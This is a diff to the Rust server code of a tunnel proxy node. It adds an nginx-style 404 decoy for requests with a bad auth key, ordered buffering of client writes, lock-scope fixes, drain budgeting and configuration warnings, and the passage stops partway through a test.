@@ -479,7 +611,20 @@ async fn wait_and_drain(session: &SessionInner, max_wait: Duration) -> (Vec<u8>,
 struct AppState {
     sessions: Arc<Mutex<HashMap<String, ManagedSession>>>,
     udp_sessions: Arc<Mutex<HashMap<String, ManagedUdpSession>>>,
-    auth_key: String,
+    /// Shared, immutable after startup. `Arc<str>` so each `state.clone()`
+    /// — once per phase-1 spawn in the batch handler — is a refcount bump
+    /// instead of a fresh String allocation.
+    auth_key: Arc<str>,
+    /// Active probing defense: when false (default, production), requests
+    /// with a bad AUTH_KEY get a generic-looking 404 with no JSON-shaped
+    /// "unauthorized" body — same as a static nginx 404. Active scanners
+    /// that POST malformed payloads to `/tunnel` to discover proxy
+    /// endpoints categorize this as a non-tunnel host and move on.
+    /// Enable via `MHRV_DIAGNOSTIC=1` for setup/debugging — restores the
+    /// previous JSON `{"e":"unauthorized"}` body so it's clear *which*
+    /// of "wrong key", "wrong URL path", or "wrong tunnel-node" you've
+    /// hit. (Inspired by #365 Section 3.)
+    diagnostic_mode: bool,
 }
 
 // ---------------------------------------------------------------------------
@@ -507,17 +652,19 @@ struct TunnelResponse {
     #[serde(skip_serializing_if = "Option::is_none")] eof: Option<bool>,
     #[serde(skip_serializing_if = "Option::is_none")] e: Option<String>,
     #[serde(skip_serializing_if = "Option::is_none")] code: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")] seq: Option<u64>,
 }
 
 impl TunnelResponse {
     fn error(msg: impl Into<String>) -> Self {
-        Self { sid: None, d: None, pkts: None, eof: None, e: Some(msg.into()), code: None }
+        Self { sid: None, d: None, pkts: None, eof: None, e: Some(msg.into()), code: None, seq: None }
     }
     fn unsupported_op(op: &str) -> Self {
         Self {
             sid: None, d: None, pkts: None, eof: None,
             e: Some(format!("unknown op: {}", op)),
             code: Some(CODE_UNSUPPORTED_OP.into()),
+            seq: None,
         }
     }
 }
@@ -539,6 +686,8 @@ struct BatchOp {
     #[serde(default)] host: Option<String>,
     #[serde(default)] port: Option<u16>,
     #[serde(default)] d: Option<String>, // base64 data
+    #[serde(default)] seq: Option<u64>,
+    #[serde(default)] wseq: Option<u64>,
 }
 
 #[derive(Serialize)]
@@ -553,19 +702,41 @@ struct BatchResponse {
 async fn handle_tunnel(
     State(state): State<AppState>,
     Json(req): Json<TunnelRequest>,
-) -> Json<TunnelResponse> {
-    if req.k != state.auth_key {
-        return Json(TunnelResponse::error("unauthorized"));
+) -> axum::response::Response {
+    if req.k != *state.auth_key {
+        return decoy_or_unauthorized(state.diagnostic_mode);
     }
-    match req.op.as_str() {
-        "connect" => Json(handle_connect(&state, req.host, req.port).await),
+    let resp: TunnelResponse = match req.op.as_str() {
+        "connect" => handle_connect(&state, req.host, req.port).await,
         "connect_data" => {
-            Json(handle_connect_data_single(&state, req.host, req.port, req.data).await)
+            handle_connect_data_single(&state, req.host, req.port, req.data).await
         }
-        "data" => Json(handle_data_single(&state, req.sid, req.data).await),
-        "close" => Json(handle_close(&state, req.sid).await),
-        other => Json(TunnelResponse::unsupported_op(other)),
-    }
+        "data" => handle_data_single(&state, req.sid, req.data).await,
+        "close" => handle_close(&state, req.sid).await,
+        other => TunnelResponse::unsupported_op(other),
+    };
+    Json(resp).into_response()
+}
+
+/// Active-probing defense for the bad-auth path. Production default is
+/// a 404 with a generic "Not Found" HTML body that mimics the stock
+/// nginx static error page — active scanners categorize this
+/// as a regular web server with nothing interesting and move on.
+/// `MHRV_DIAGNOSTIC=1` restores the previous JSON `{"e":"unauthorized"}`
+/// body so misconfigured clients get a clear error during setup.
+fn decoy_or_unauthorized(diagnostic_mode: bool) -> axum::response::Response {
+    if diagnostic_mode {
+        return Json(TunnelResponse::error("unauthorized")).into_response();
+    }
+    let body = "<html>\r\n<head><title>404 Not Found</title></head>\r\n\
+                <body>\r\n<center><h1>404 Not Found</h1></center>\r\n\
+                <hr><center>nginx</center>\r\n</body>\r\n</html>\r\n";
+    (
+        StatusCode::NOT_FOUND,
+        [(header::CONTENT_TYPE, "text/html")],
+        body,
+    )
+        .into_response()
 }
 
 // ---------------------------------------------------------------------------
@@ -601,11 +772,21 @@ async fn handle_batch(
         }
     };
 
-    if req.k != state.auth_key {
-        let resp = serde_json::to_vec(&BatchResponse {
-            r: vec![TunnelResponse::error("unauthorized")],
-        }).unwrap_or_default();
-        return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp);
+    if req.k != *state.auth_key {
+        if state.diagnostic_mode {
+            let resp = serde_json::to_vec(&BatchResponse {
+                r: vec![TunnelResponse::error("unauthorized")],
+            }).unwrap_or_default();
+            return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp);
+        }
+        // Production: same nginx-404 decoy as the single-op path. See
+        // `decoy_or_unauthorized` for rationale.
+        let body = "<html>\r\n<head><title>404 Not Found</title></head>\r\n\
+                    <body>\r\n<center><h1>404 Not Found</h1></center>\r\n\
+                    <hr><center>nginx</center>\r\n</body>\r\n</html>\r\n"
+            .as_bytes()
+            .to_vec();
+        return (StatusCode::NOT_FOUND, [(header::CONTENT_TYPE, "text/html")], body);
     }
 
     // Process all ops in two phases.
@@ -624,8 +805,13 @@ async fn handle_batch(
     // still fires from server-speaks-first ports and from the preread
     // timeout fallback path.
     let mut results: Vec<(usize, TunnelResponse)> = Vec::with_capacity(req.ops.len());
-    let mut tcp_drains: Vec<(usize, String)> = Vec::new();
-    let mut udp_drains: Vec<(usize, String)> = Vec::new();
+    // Each drain entry carries the session's `Arc<…Inner>` and the op's
+    // optional `seq` alongside the sid. Phase 2 drains through the Arc so
+    // the global sessions map lock isn't held across the per-session
+    // read_buf / packets mutex acquisition — without this, every other
+    // batch (and every connect/close op) head-of-line-blocks behind the drain.
+    let mut tcp_drains: Vec<(usize, String, Arc<SessionInner>, Option<u64>)> = Vec::new();
+    let mut udp_drains: Vec<(usize, String, Arc<UdpSessionInner>, Option<u64>)> = Vec::new();
     // True iff the batch contained any op that performed a real action
     // upstream — a new connection or a non-empty data write. A batch of
     // only empty "data" / "udp_data" polls (and possibly closes) leaves
@@ -634,8 +820,8 @@ async fn handle_batch(
 
     enum NewConn {
         Connect(TunnelResponse),
-        ConnectData(Result<String, TunnelResponse>),
-        UdpOpen(Result<String, TunnelResponse>),
+        ConnectData(Result<(String, Arc<SessionInner>), TunnelResponse>),
+        UdpOpen(Result<(String, Arc<UdpSessionInner>), TunnelResponse>),
     }
     let mut new_conn_jobs: JoinSet<(usize, NewConn)> = JoinSet::new();
 
@@ -657,13 +843,11 @@ async fn handle_batch(
                 let port = op.port;
                 let d = op.d.clone();
                 new_conn_jobs.spawn(async move {
-                    // Drop the returned Arc<SessionInner>: phase 2 below
-                    // re-looks up each sid under one sessions-map lock,
-                    // which is cheap. The Arc return is a convenience for
-                    // the single-op path only.
-                    let r = handle_connect_data_phase1(&state, host, port, d)
-                        .await
-                        .map(|(sid, _inner)| sid);
+                    // Keep the returned Arc<SessionInner>: phase 2 drains
+                    // through it directly, so the global sessions map
+                    // lock doesn't have to be held across the per-session
+                    // read_buf.lock().await.
+                    let r = handle_connect_data_phase1(&state, host, port, d).await;
                     (i, NewConn::ConnectData(r))
                 });
             }
@@ -680,9 +864,7 @@ async fn handle_batch(
                 let port = op.port;
                 let d = op.d.clone();
                 new_conn_jobs.spawn(async move {
-                    let r = handle_udp_open_phase1(&state, host, port, d)
-                        .await
-                        .map(|(sid, _inner)| sid);
+                    let r = handle_udp_open_phase1(&state, host, port, d).await;
                     (i, NewConn::UdpOpen(r))
                 });
             }
@@ -692,27 +874,92 @@ async fn handle_batch(
                     _ => { results.push((i, TunnelResponse::error("missing sid"))); continue; }
                 };
 
-                // Write outbound data
-                let sessions = state.sessions.lock().await;
-                if let Some(session) = sessions.get(&sid) {
-                    *session.inner.last_active.lock().await = Instant::now();
+                // Clone the inner under the map lock and release it
+                // before any await. The previous shape held the global
+                // sessions map across last_active.lock(), writer.lock(),
+                // write_all, and flush — head-of-line-blocking every
+                // other batch and connect/close op for the duration of
+                // a single upstream write. The udp_data branch below
+                // already does the right thing; this matches it.
+                let inner = {
+                    let sessions = state.sessions.lock().await;
+                    sessions.get(&sid).map(|s| s.inner.clone())
+                };
+                if let Some(inner) = inner {
+                    *inner.last_active.lock().await = Instant::now();
                     if let Some(ref data_b64) = op.d {
                         if !data_b64.is_empty() {
-                            had_writes_or_connects = true;
-                            if let Ok(bytes) = B64.decode(data_b64) {
-                                if !bytes.is_empty() {
-                                    let mut w = session.inner.writer.lock().await;
-                                    let _ = w.write_all(&bytes).await;
-                                    let _ = w.flush().await;
+                            // Decode first; only count this op as a real
+                            // write (and demote the batch out of long-poll)
+                            // after a successful non-empty decode. Mirrors
+                            // the udp_data branch and avoids silently
+                            // dropping bytes on bad base64.
+                            let bytes = match B64.decode(data_b64) {
+                                Ok(b) => b,
+                                Err(e) => {
+                                    results.push((
+                                        i,
+                                        TunnelResponse::error(format!("bad base64: {}", e)),
+                                    ));
+                                    continue;
+                                }
+                            };
+                            if !bytes.is_empty() {
+                                had_writes_or_connects = true;
+                                tracing::info!(
+                                    "session {} upload {}B wseq={:?}",
+                                    &sid[..sid.len().min(8)], bytes.len(), op.wseq,
+                                );
+                                match op.wseq {
+                                    None => {
+                                        // Old client (no wseq): write immediately.
+                                        let mut w = inner.writer.lock().await;
+                                        let _ = w.write_all(&bytes).await;
+                                        let _ = w.flush().await;
+                                    }
+                                    Some(wseq) => {
+                                        let mut nws = inner.next_write_seq.lock().await;
+                                        let expected = nws.get_or_insert(wseq);
+
+                                        if wseq < *expected {
+                                            // Stale / duplicate — skip.
+                                            tracing::debug!(
+                                                "session {} wseq {} < expected {} — skipping",
+                                                &sid[..sid.len().min(8)], wseq, *expected,
+                                            );
+                                        } else if wseq == *expected {
+                                            // In order — write immediately.
+                                            let mut w = inner.writer.lock().await;
+                                            let _ = w.write_all(&bytes).await;
+                                            *expected += 1;
+
+                                            // Flush any buffered writes that
+                                            // are now in sequence.
+                                            let mut pw = inner.pending_writes.lock().await;
+                                            while let Some(entry) = pw.first_entry() {
+                                                if *entry.key() != *expected { break; }
+                                                let (_, buffered) = entry.remove_entry();
+                                                let _ = w.write_all(&buffered).await;
+                                                *expected += 1;
+                                            }
+                                            let _ = w.flush().await;
+                                        } else {
+                                            // Out of order — buffer for later.
+                                            tracing::debug!(
+                                                "session {} wseq {} > expected {} — buffering",
+                                                &sid[..sid.len().min(8)], wseq, *expected,
+                                            );
+                                            let mut pw = inner.pending_writes.lock().await;
+                                            pw.insert(wseq, bytes);
+                                        }
+                                    }
                                 }
                             }
                         }
                     }
-                    drop(sessions);
-                    tcp_drains.push((i, sid));
+                    tcp_drains.push((i, sid, inner, op.seq));
                 } else {
-                    drop(sessions);
-                    results.push((i, eof_response(sid)));
+                    results.push((i, eof_response(sid, op.seq)));
                 }
             }
             "udp_data" => {
@@ -753,9 +1000,9 @@ async fn handle_batch(
                     if had_uplink {
                         *inner.last_active.lock().await = Instant::now();
                     }
-                    udp_drains.push((i, sid));
+                    udp_drains.push((i, sid, inner, op.seq));
                 } else {
-                    results.push((i, eof_response(sid)));
+                    results.push((i, eof_response(sid, op.seq)));
                 }
             }
             "close" => {
@@ -774,9 +1021,13 @@ async fn handle_batch(
     while let Some(join) = new_conn_jobs.join_next().await {
         match join {
             Ok((i, NewConn::Connect(r))) => results.push((i, r)),
-            Ok((i, NewConn::ConnectData(Ok(sid)))) => tcp_drains.push((i, sid)),
+            Ok((i, NewConn::ConnectData(Ok((sid, inner))))) => {
+                tcp_drains.push((i, sid, inner, None));
+            }
             Ok((i, NewConn::ConnectData(Err(r)))) => results.push((i, r)),
-            Ok((i, NewConn::UdpOpen(Ok(sid)))) => udp_drains.push((i, sid)),
+            Ok((i, NewConn::UdpOpen(Ok((sid, inner))))) => {
+                udp_drains.push((i, sid, inner, None));
+            }
             Ok((i, NewConn::UdpOpen(Err(r)))) => results.push((i, r)),
             Err(e) => {
                 tracing::error!("new-connection task panicked: {}", e);
@@ -802,90 +1053,159 @@ async fn handle_batch(
             LONGPOLL_DEADLINE
         };
 
-        let tcp_inners: Vec<Arc<SessionInner>> = {
-            let sessions = state.sessions.lock().await;
-            tcp_drains
-                .iter()
-                .filter_map(|(_, sid)| sessions.get(sid).map(|s| s.inner.clone()))
-                .collect()
-        };
-        let udp_inners: Vec<Arc<UdpSessionInner>> = {
-            let sessions = state.udp_sessions.lock().await;
-            udp_drains
-                .iter()
-                .filter_map(|(_, sid)| sessions.get(sid).map(|s| s.inner.clone()))
-                .collect()
-        };
-
-        let wait_start = Instant::now();
-        // Wait for either side to wake. Running both concurrently means
-        // a TCP-only batch isn't slowed by a stale UDP watch list, and
-        // vice versa.
-        tokio::join!(
-            wait_for_any_drainable(&tcp_inners, deadline),
-            wait_for_any_udp_drainable(&udp_inners, deadline),
-        );
+        // Phase 1 already gave us each session's Arc<…Inner>, so we
+        // don't need to re-acquire the sessions map lock here. Cloning
+        // the Arc is just a refcount bump.
+        let tcp_inners: Vec<Arc<SessionInner>> =
+            tcp_drains.iter().map(|(_, _, inner, _)| inner.clone()).collect();
+        let udp_inners: Vec<Arc<UdpSessionInner>> =
+            udp_drains.iter().map(|(_, _, inner, _)| inner.clone()).collect();
+
+        // Wake on whichever side has work first. The previous
+        // `tokio::join!` was conjunctive — a TCP burst still paid the
+        // UDP deadline in mixed batches because the UDP waiter had to
+        // elapse too. `wait_for_*_drainable` short-circuits on an empty
+        // slice, so we have to skip the empty side; otherwise its
+        // instant return would fire the select arm before the other
+        // side ever got a chance to wait.
+        match (tcp_inners.is_empty(), udp_inners.is_empty()) {
+            (true, true) => {}
+            (false, true) => wait_for_any_drainable(&tcp_inners, deadline).await,
+            (true, false) => wait_for_any_udp_drainable(&udp_inners, deadline).await,
+            (false, false) => {
+                tokio::select! {
+                    _ = wait_for_any_drainable(&tcp_inners, deadline) => {}
+                    _ = wait_for_any_udp_drainable(&udp_inners, deadline) => {}
+                }
+            }
+        }
 
         if had_writes_or_connects {
-            let remaining = deadline.saturating_sub(wait_start.elapsed());
-            if !remaining.is_zero() {
-                tokio::time::sleep(STRAGGLER_SETTLE.min(remaining)).await;
+            // Adaptive settle: keep waiting in steps while new data
+            // keeps arriving. Break when:
+            //  1. No new data arrived in the last step (burst is over)
+            //  2. STRAGGLER_SETTLE_MAX reached
+            let settle_end = Instant::now() + STRAGGLER_SETTLE_MAX;
+            let mut prev_tcp_bytes: usize = 0;
+            let mut prev_udp_pkts: usize = 0;
+            // Snapshot current buffer sizes.
+            for inner in &tcp_inners {
+                prev_tcp_bytes += inner.read_buf.lock().await.len();
             }
-        }
+            for inner in &udp_inners {
+                prev_udp_pkts += inner.packets.lock().await.len();
+            }
+            loop {
+                let now = Instant::now();
+                if now >= settle_end {
+                    break;
+                }
+                let remaining = settle_end.duration_since(now);
+                tokio::time::sleep(STRAGGLER_SETTLE_STEP.min(remaining)).await;
+
+                // Measure current buffer sizes.
+                let mut tcp_bytes: usize = 0;
+                let mut udp_pkts: usize = 0;
+                for inner in &tcp_inners {
+                    tcp_bytes += inner.read_buf.lock().await.len();
+                }
+                for inner in &udp_inners {
+                    udp_pkts += inner.packets.lock().await.len();
+                }
 
-        // ---- TCP drain ----
-        if !tcp_drains.is_empty() {
-            let sessions = state.sessions.lock().await;
-            for (i, sid) in &tcp_drains {
-                if let Some(session) = sessions.get(sid) {
-                    let (data, eof) = drain_now(&session.inner).await;
-                    results.push((*i, tcp_drain_response(sid.clone(), data, eof)));
-                } else {
-                    results.push((*i, eof_response(sid.clone())));
+                // No new data since last step — burst is over.
+                if tcp_bytes == prev_tcp_bytes && udp_pkts == prev_udp_pkts {
+                    break;
                 }
+
+                prev_tcp_bytes = tcp_bytes;
+                prev_udp_pkts = udp_pkts;
             }
-            drop(sessions);
+        }
 
-            // Clean up eof TCP sessions.
+        // ---- TCP drain ----
+        // Drain through each session's already-cloned Arc so the global
+        // sessions map lock isn't held across the per-session
+        // read_buf.lock().await.
+        //
+        // Cleanup is driven off `drain_now`'s returned `eof`, NOT the
+        // raw `inner.eof` atomic. When the buffer exceeds
+        // `TCP_DRAIN_MAX_BYTES`, `drain_now` deliberately returns
+        // `eof = false` and leaves the tail in the buffer so the
+        // client can pick it up on the next poll. The previous cleanup
+        // read the atomic directly, so on a high-throughput session
+        // that closed mid-burst (issue #460-style) it would remove the
+        // session and abort the reader_task with the tail still
+        // buffered, dropping those bytes.
+        let mut tcp_eof_sids: Vec<String> = Vec::new();
+        // Track remaining batch-response budget across all session drains
+        // (#863). Per-session `TCP_DRAIN_MAX_BYTES` alone wasn't enough —
+        // several concurrent sessions each contributing 16 MiB summed past
+        // Apps Script's 50 MiB response ceiling. This cap stops one session
+        // short of the cliff; deferred sessions drain on the next poll.
+        let mut remaining_budget: usize = BATCH_RESPONSE_BUDGET;
+        for (i, sid, inner, seq) in &tcp_drains {
+            // Drain in a loop: keep reading until the buffer is empty
+            // so we catch data that arrives during the drain itself.
+            let mut all_data = Vec::new();
+            let mut final_eof = false;
+            let drain_deadline = Instant::now() + Duration::from_secs(1);
+            loop {
+                let (data, eof) = drain_now(inner, remaining_budget.saturating_sub(all_data.len())).await;
+                if eof { final_eof = true; }
+                if data.is_empty() { break; }
+                let hit_session_cap = data.len() >= TCP_DRAIN_MAX_BYTES;
+                all_data.extend_from_slice(&data);
+                if final_eof || hit_session_cap || all_data.len() >= remaining_budget { break; }
+                if Instant::now() >= drain_deadline { break; }
+                // Brief yield to let reader_task finish its current read
+                tokio::task::yield_now().await;
+            }
+            let drained = all_data.len();
+            if drained > 0 {
+                tracing::info!("session {} drained {}KB", &sid[..sid.len().min(8)], drained / 1024);
+            }
+            if final_eof {
+                tcp_eof_sids.push(sid.clone());
+            }
+            results.push((*i, tcp_drain_response(sid.clone(), all_data, final_eof, *seq)));
+            remaining_budget = remaining_budget.saturating_sub(drained);
+            if remaining_budget == 0 {
+                break;
+            }
+        }
+        if !tcp_eof_sids.is_empty() {
             let mut sessions = state.sessions.lock().await;
-            for (_, sid) in &tcp_drains {
-                if let Some(s) = sessions.get(sid) {
-                    if s.inner.eof.load(Ordering::Acquire) {
-                        if let Some(s) = sessions.remove(sid) {
-                            s.reader_handle.abort();
-                            tracing::info!("session {} closed by remote (batch)", sid);
-                        }
-                    }
+            for sid in &tcp_eof_sids {
+                if let Some(s) = sessions.remove(sid) {
+                    s.reader_handle.abort();
+                    tracing::info!("session {} closed by remote (batch)", sid);
                 }
             }
         }
 
         // ---- UDP drain ----
-        if !udp_drains.is_empty() {
-            {
-                let sessions = state.udp_sessions.lock().await;
-                for (i, sid) in &udp_drains {
-                    if let Some(session) = sessions.get(sid) {
-                        let (packets, eof) = drain_udp_now(&session.inner).await;
-                        results.push((*i, udp_drain_response(sid.clone(), packets, eof)));
-                    } else {
-                        results.push((*i, eof_response(sid.clone())));
-                    }
-                }
+        // Same shape as TCP. `drain_udp_now` currently drains the full
+        // queue with no per-batch cap, so its returned `eof` already
+        // matches the atomic — driving cleanup off the drain return
+        // is future-proofing: if a UDP per-batch packet cap is ever
+        // added (mirroring `TCP_DRAIN_MAX_BYTES`), the same data-loss
+        // trap that motivated the TCP-side fix reappears, and tracking
+        // eof from the drain return rather than the atomic catches it.
+        let mut udp_eof_sids: Vec<String> = Vec::new();
+        for (i, sid, inner, seq) in &udp_drains {
+            let (packets, eof) = drain_udp_now(inner).await;
+            if eof {
+                udp_eof_sids.push(sid.clone());
             }
-
-            // Clean up eof UDP sessions so a future batch with the same
-            // sid gets the "session not found" eof immediately rather
-            // than re-checking the (already-stale) eof flag.
+            results.push((*i, udp_drain_response(sid.clone(), packets, eof, *seq)));
+        }
+        if !udp_eof_sids.is_empty() {
             let mut sessions = state.udp_sessions.lock().await;
-            for (_, sid) in &udp_drains {
-                if let Some(s) = sessions.get(sid) {
-                    if s.inner.eof.load(Ordering::Acquire) {
-                        if let Some(s) = sessions.remove(sid) {
-                            s.reader_handle.abort();
-                            tracing::info!("udp session {} closed by remote (batch)", sid);
-                        }
-                    }
+            for sid in &udp_eof_sids {
+                if let Some(s) = sessions.remove(sid) {
+                    s.reader_handle.abort();
+                    tracing::info!("udp session {} closed by remote (batch)", sid);
                 }
             }
         }
@@ -901,7 +1221,7 @@ async fn handle_batch(
     (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], json)
 }
 
-fn tcp_drain_response(sid: String, data: Vec<u8>, eof: bool) -> TunnelResponse {
+fn tcp_drain_response(sid: String, data: Vec<u8>, eof: bool, seq: Option<u64>) -> TunnelResponse {
     TunnelResponse {
         sid: Some(sid),
         d: if data.is_empty() { None } else { Some(B64.encode(&data)) },
@@ -909,10 +1229,11 @@ fn tcp_drain_response(sid: String, data: Vec<u8>, eof: bool) -> TunnelResponse {
         eof: Some(eof),
         e: None,
         code: None,
+        seq,
     }
 }
 
-fn udp_drain_response(sid: String, packets: Vec<Vec<u8>>, eof: bool) -> TunnelResponse {
+fn udp_drain_response(sid: String, packets: Vec<Vec<u8>>, eof: bool, seq: Option<u64>) -> TunnelResponse {
     let pkts = if packets.is_empty() {
         None
     } else {
@@ -925,10 +1246,11 @@ fn udp_drain_response(sid: String, packets: Vec<Vec<u8>>, eof: bool) -> TunnelRe
         eof: Some(eof),
         e: None,
         code: None,
+        seq,
     }
 }
 
-fn eof_response(sid: String) -> TunnelResponse {
+fn eof_response(sid: String, seq: Option<u64>) -> TunnelResponse {
     TunnelResponse {
         sid: Some(sid),
         d: None,
@@ -936,6 +1258,7 @@ fn eof_response(sid: String) -> TunnelResponse {
         eof: Some(true),
         e: None,
         code: None,
+        seq,
     }
 }
 
@@ -971,22 +1294,27 @@ async fn handle_connect(state: &AppState, host: Option<String>, port: Option<u16
         Ok(v) => v,
         Err(r) => return r,
     };
-    let session = match create_session(&host, port).await {
-        Ok(s) => s,
-        Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)),
+    let session = if udpgw::is_udpgw_dest(&host, port) {
+        create_udpgw_session()
+    } else {
+        match create_session(&host, port).await {
+            Ok(s) => s,
+            Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)),
+        }
     };
     let sid = uuid::Uuid::new_v4().to_string();
     tracing::info!("session {} -> {}:{}", sid, host, port);
     state.sessions.lock().await.insert(sid.clone(), session);
-    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(false), e: None, code: None }
+    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(false), e: None, code: None, seq: None }
 }
 
 /// Open a session and write the client's first bytes in one round trip.
-/// Returns the new sid plus an `Arc<SessionInner>` so unary callers
-/// (`handle_connect_data_single`) can drain the first response without a
-/// second sessions-map lookup. The batch caller drops the Arc — it takes
-/// a single lock across all drain-bound sessions in phase 2, which is
-/// cheaper than the Arc plumbing would be.
+/// Returns the new sid plus an `Arc<SessionInner>`. Both callers keep
+/// the Arc: the unary path (`handle_connect_data_single`) uses it to
+/// drain the first response without a second sessions-map lookup, and
+/// the batch path threads it into `tcp_drains` so phase-2 drain runs
+/// without holding the global sessions map lock across the per-session
+/// `read_buf.lock().await`.
 async fn handle_connect_data_phase1(
     state: &AppState,
     host: Option<String>,
@@ -995,9 +1323,13 @@ async fn handle_connect_data_phase1(
 ) -> Result<(String, Arc<SessionInner>), TunnelResponse> {
     let (host, port) = validate_host_port(host, port)?;
 
-    let session = create_session(&host, port)
-        .await
-        .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))?;
+    let session = if udpgw::is_udpgw_dest(&host, port) {
+        create_udpgw_session()
+    } else {
+        create_session(&host, port)
+            .await
+            .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))?
+    };
 
     // Any failure below this point must abort the reader task, otherwise
     // the newly-opened upstream TCP connection would leak. Keep the
@@ -1095,6 +1427,7 @@ async fn handle_connect_data_single(
         eof: Some(eof),
         e: None,
         code: None,
+        seq: None,
     }
 }
 
@@ -1103,19 +1436,27 @@ async fn handle_data_single(state: &AppState, sid: Option<String>, data: Option<
         Some(s) if !s.is_empty() => s,
         _ => return TunnelResponse::error("missing sid"),
     };
-    let sessions = state.sessions.lock().await;
-    let session = match sessions.get(&sid) {
-        Some(s) => s,
+    // Clone the inner Arc under the global sessions map lock and release
+    // the map lock before any await. The previous shape held the map
+    // across last_active.lock(), writer.lock(), write_all, flush, AND
+    // wait_and_drain — up to 5 s of head-of-line blocking on every other
+    // single-op or batch request. Mirrors the batch-handler "data" path.
+    let inner = {
+        let sessions = state.sessions.lock().await;
+        sessions.get(&sid).map(|s| s.inner.clone())
+    };
+    let inner = match inner {
+        Some(i) => i,
         None => return TunnelResponse::error("unknown session"),
     };
-    *session.inner.last_active.lock().await = Instant::now();
+    *inner.last_active.lock().await = Instant::now();
     if let Some(ref data_b64) = data {
         if !data_b64.is_empty() {
             if let Ok(bytes) = B64.decode(data_b64) {
                 if !bytes.is_empty() {
-                    let mut w = session.inner.writer.lock().await;
+                    let mut w = inner.writer.lock().await;
                     if let Err(e) = w.write_all(&bytes).await {
-                        drop(w); drop(sessions);
+                        drop(w);
                         state.sessions.lock().await.remove(&sid);
                         return TunnelResponse::error(format!("write failed: {}", e));
                     }
@@ -1124,8 +1465,7 @@ async fn handle_data_single(state: &AppState, sid: Option<String>, data: Option<
             }
         }
     }
-    let (data, eof) = wait_and_drain(&session.inner, Duration::from_secs(5)).await;
-    drop(sessions);
+    let (data, eof) = wait_and_drain(&inner, Duration::from_secs(5)).await;
     if eof {
         if let Some(s) = state.sessions.lock().await.remove(&sid) {
             s.reader_handle.abort();
@@ -1136,7 +1476,7 @@ async fn handle_data_single(state: &AppState, sid: Option<String>, data: Option<
         sid: Some(sid),
         d: if data.is_empty() { None } else { Some(B64.encode(&data)) },
         pkts: None,
-        eof: Some(eof), e: None, code: None,
+        eof: Some(eof), e: None, code: None, seq: None,
     }
 }
 
@@ -1146,14 +1486,14 @@ async fn handle_close(state: &AppState, sid: Option<String>) -> TunnelResponse {
         _ => return TunnelResponse::error("missing sid"),
     };
     if let Some(s) = state.sessions.lock().await.remove(&sid) {
-        s.reader_handle.abort();
+        s.abort_all();
         tracing::info!("session {} closed by client", sid);
     }
     if let Some(s) = state.udp_sessions.lock().await.remove(&sid) {
         s.reader_handle.abort();
         tracing::info!("udp session {} closed by client", sid);
     }
-    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(true), e: None, code: None }
+    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(true), e: None, code: None, seq: None }
 }
 
 // ---------------------------------------------------------------------------
@@ -1234,7 +1574,24 @@ async fn main() {
         .init();
 
     let auth_key = std::env::var("TUNNEL_AUTH_KEY").unwrap_or_else(|_| {
-        tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)");
+        // Catch the recurring `MHRV_AUTH_KEY` typo (#391, #444). Several old
+        // copy-paste guides used `MHRV_AUTH_KEY` for the docker run; tunnel-node
+        // never read that name and silently fell through to `changeme`,
+        // producing baffling AUTH_KEY-mismatch decoys on the client. If
+        // `MHRV_AUTH_KEY` is set, point at it specifically so the user sees
+        // why their value isn't taking effect.
+        if std::env::var("MHRV_AUTH_KEY").is_ok() {
+            tracing::warn!(
+                "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — \
+                 tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with \
+                 underscores). Rename your env var: \
+                 `docker run ... -e TUNNEL_AUTH_KEY=<your-secret>`. Falling \
+                 back to default `changeme` for now (INSECURE — clients will \
+                 fail with AUTH_KEY mismatch decoys until this is fixed)."
+            );
+        } else {
+            tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)");
+        }
         "changeme".into()
     });
     let port: u16 = std::env::var("PORT")
@@ -1248,7 +1605,25 @@ async fn main() {
         Arc::new(Mutex::new(HashMap::new()));
     tokio::spawn(cleanup_task(sessions.clone(), udp_sessions.clone()));
 
-    let state = AppState { sessions, udp_sessions, auth_key };
+    // MHRV_DIAGNOSTIC=1 in env restores verbose JSON error responses on
+    // bad auth (instead of the nginx-404 decoy). Use during setup so
+    // misconfigured clients see "unauthorized"; flip back off in prod.
+    let diagnostic_mode = std::env::var("MHRV_DIAGNOSTIC")
+        .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
+        .unwrap_or(false);
+    if diagnostic_mode {
+        tracing::warn!(
+            "MHRV_DIAGNOSTIC=1 — bad-auth responses are verbose JSON \
+             errors instead of the production nginx-404 decoy. Disable \
+             before exposing this tunnel-node to the public internet."
+        );
+    }
+    let state = AppState {
+        sessions,
+        udp_sessions,
+        auth_key: Arc::from(auth_key),
+        diagnostic_mode,
+    };
 
     let app = Router::new()
         .route("/tunnel", post(handle_tunnel))
@@ -1283,6 +1658,10 @@ mod tests {
             sessions: Arc::new(Mutex::new(HashMap::new())),
             udp_sessions: Arc::new(Mutex::new(HashMap::new())),
             auth_key: "test-key".into(),
+            // Tests assert against the JSON `unauthorized` body shape
+            // (see e.g. `bad_auth_returns_unauthorized`), so they need
+            // diagnostic_mode enabled. Production default is false.
+            diagnostic_mode: true,
         }
     }
 
@@ -1430,14 +1809,100 @@ mod tests {
         let (_reader, writer) = client.into_split();
 
         Arc::new(SessionInner {
-            writer: Mutex::new(writer),
+            writer: Mutex::new(SessionWriter::Tcp(writer)),
             read_buf: Mutex::new(Vec::new()),
             eof: AtomicBool::new(false),
             last_active: Mutex::new(Instant::now()),
             notify: Notify::new(),
+            next_write_seq: Mutex::new(None),
+            pending_writes: Mutex::new(std::collections::BTreeMap::new()),
         })
     }
 
+    #[tokio::test]
+    async fn drain_now_caps_at_tcp_drain_max_bytes() {
+        // Regression for issue #460: when the reader has buffered more than
+        // one response may carry, `drain_now` must return no more than
